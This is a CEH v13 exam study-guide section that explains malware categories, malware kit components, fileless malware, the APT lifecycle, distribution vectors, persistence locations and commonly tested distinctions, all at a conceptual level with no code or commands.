4.1 Malware Concepts and Taxonomy

Why Malware Taxonomy Matters on CEH

The Certified Ethical Hacker (CEH) v13 exam treats malware as a classification problem first. Questions rarely ask you to write malicious code; they describe a behavior — "spreads automatically across the network with no user action" or "runs entirely in memory using PowerShell" — and ask you to name the category, the propagation method, or the correct kit component. Malware Threats is one of the heaviest modules on the exam (roughly 10-14% of theory items, plus multiple flags on the CEH Practical), so getting the taxonomy right pays off across many questions.

The single most useful distinction is how a sample replicates and propagates. A virus attaches itself to a host file or document and only runs when a user executes that host; it then infects other files on the same system. A worm is self-propagating — it copies itself across a network by exploiting a service or weak credential, requiring no user interaction (the 2017 WannaCry worm spread via the EternalBlue SMB exploit). A Trojan does not self-replicate at all: it disguises itself as legitimate software so the victim installs it voluntarily, then performs hidden malicious actions.

When a CEH scenario stresses automatic network-wide spread, the answer is worm; when it stresses a malicious file masquerading as something useful, the answer is Trojan.

The Major Malware Families

Ransomware denies access to data by encrypting it and demands payment (usually cryptocurrency) for the decryption key; modern strains add double extortion (steal data first, then threaten to leak it). A rootkit is a toolkit that gains and hides administrative (kernel- or user-mode) access, concealing processes, files, and network connections from the operating system and defenders. A Remote Access Trojan (RAT) gives an attacker interactive remote control — keylogging, screen capture, file transfer, webcam access — and is a frequent Trojan payload.

Spyware/keyloggers quietly harvest credentials and keystrokes, while adware forces unwanted ads. A botnet is a collection of compromised hosts ("bots" or "zombies") that an attacker commands through a command-and-control (C2) channel to launch DDoS attacks, send spam, or mine cryptocurrency.

Malware Kit Components and the APT Lifecycle

Modern malware is modular, and CEH tests the parts by job:

• Dropper — a stub that carries and installs the malicious payload it already contains.
• Downloader — a small first-stage stub that retrieves the full payload from an attacker server.
• Payload — the code that performs the actual objective (encrypt, exfiltrate, backdoor).
• Packer / crypter — compresses or encrypts the binary so its signature changes, defeating static antivirus.
• Wrapper / binder — joins the malicious payload to a legitimate program so the victim runs both.
• Exploit — the vulnerability-trigger that gains initial code execution.

Fileless malware deserves special attention: it executes directly in memory by abusing trusted, signed system tools — PowerShell, WMI (Windows Management Instrumentation), and the registry — a tactic called living off the land (LOLBins). Because no malicious file lands on disk, signature scanning misses it, which is why CEH stresses behavioral detection here.

For sophisticated, long-term intrusions, CEH tests the Advanced Persistent Threat (APT) lifecycle. The EC-Council sequence is: (1) Preparation (define and research the target, build tools), (2) Initial Intrusion (often spear-phishing to gain a foothold), (3) Expansion (lateral movement to more systems and higher privilege), (4) Persistence (maintain access and evade endpoint security), (5) Search and Exfiltration (locate and steal valuable data), and (6) Cleanup (cover tracks, remove evidence).

APTs are defined by being advanced (custom tooling), persistent (low-and-slow, long dwell time), and a threat (well-resourced, often nation-state actors). Recognizing the phase a scenario describes is a common exam pattern.

Distribution, Persistence, and Exam Traps

CEH also expects you to know how malware reaches a system and how it survives a reboot. Common distribution vectors are phishing email attachments and links, drive-by downloads from compromised or malicious sites, malvertising, trojanized software and pirated installers, infected removable media (USB), and supply-chain compromise of trusted updates.

Once executed, malware establishes persistence so it restarts after reboot: registry Run/RunOnce keys, scheduled tasks, Windows services, startup folders, WMI event subscriptions, and on Linux cron jobs, systemd units, or modified rc scripts. Rootkits push persistence into the kernel or boot process (bootkits) to load before defenses.

Watch for these frequently tested distinctions and traps:

• Virus vs worm — replication that needs a host file and a user (virus) versus self-propagation across the network (worm). This is the most common trick question.
• Trojan vs virus/worm — a Trojan does not replicate; it relies on disguise. A RAT is a type of Trojan, not a separate replication class.
• Polymorphic vs metamorphic — a polymorphic virus encrypts its body with a changing key (a decryptor stays constant-ish), while a metamorphic virus rewrites its own code each generation, with no constant decryptor — making it the harder of the two to signature.
• Crypter vs packer — both obscure a binary; a packer primarily compresses (UPX), a crypter primarily encrypts to evade AV. Both defeat static signatures, not behavioral detection.
• Logic bomb — code that triggers on a condition (a date, an event), often planted by a malicious insider.

A quick reference for the families and their headline trait:

Nailing these distinctions is what separates a confident answer from a guess on the malware questions.